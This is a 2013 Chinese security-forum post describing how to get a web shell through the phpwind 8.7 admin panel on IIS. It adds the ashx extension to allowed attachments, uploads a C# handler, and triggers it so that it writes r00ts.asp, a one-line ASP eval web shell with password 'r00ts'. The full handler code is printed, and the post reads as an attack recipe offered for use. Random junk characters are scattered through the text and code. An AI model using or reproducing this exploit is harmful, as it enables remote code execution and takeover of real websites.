找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2112|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小8 Y7 F' i1 W' ^& v

0 p4 k0 _: D  b" ^, P, r群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx- O7 k0 g  {* d5 ~  u8 I
( J! C9 l/ ^9 L  O# @- G! V
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整+ d: u) N8 i  a/ J  T9 t
& C4 \! V: K4 ?5 [. E" Q% W2 x; Q4 n* H
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx# g8 `$ O; K: r  X+ Z  E
$ n) d8 v& s# B# [
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
4 c& M9 k' S0 r; e: T
' O+ [( |& A8 a下面是代码:9 R; f8 i6 G/ w- t- S* P2 j6 e8 d
1 f( k! K. w. [8 |. Q
<%@ WebHandler Language="C#"Class="Handler" %>
2 P# K% p$ {: n9 p0 susing System;( f: l; {; g2 u3 t
using System.Web;
. A$ i- E7 T" S# z$ G6 Z1 fusing System.IO;) I  G% u+ O$ b( A
public class Handler : IHttpHandler {
; d+ K0 [( ~5 `7 Y) `  y9 opublic void ProcessRequest (HttpContext context) {& {' r7 z. j+ b& C; X. @
context.Response.ContentType = "text/plain";$ T4 t( A& D" b6 D
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
& R. b0 ?/ r4 X( \/ a3 ?file1.Write("<%eval request(\"r00ts\")%>");% l* [1 {. z# L5 A& a: @
file1.Flush();" M* e4 ^- b8 F5 Q6 ], n: l
file1.Close();, U" c" v- R1 u! d& v# O; V( t
}
5 ]" B9 w0 O  }3 Jpublic bool IsReusable {; J! I: i: k# S" V, J
get {
" u7 G' S, A5 E4 f$ r& ^* Yreturn false;, `( e# F- l! ^( @# s
}% m4 Z) M8 D1 g& q" Q
}, |; s! d0 o0 m6 P& ~$ w. T1 w+ k
}+ I. e# G6 _$ l/ C; Z  {& c+ W
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表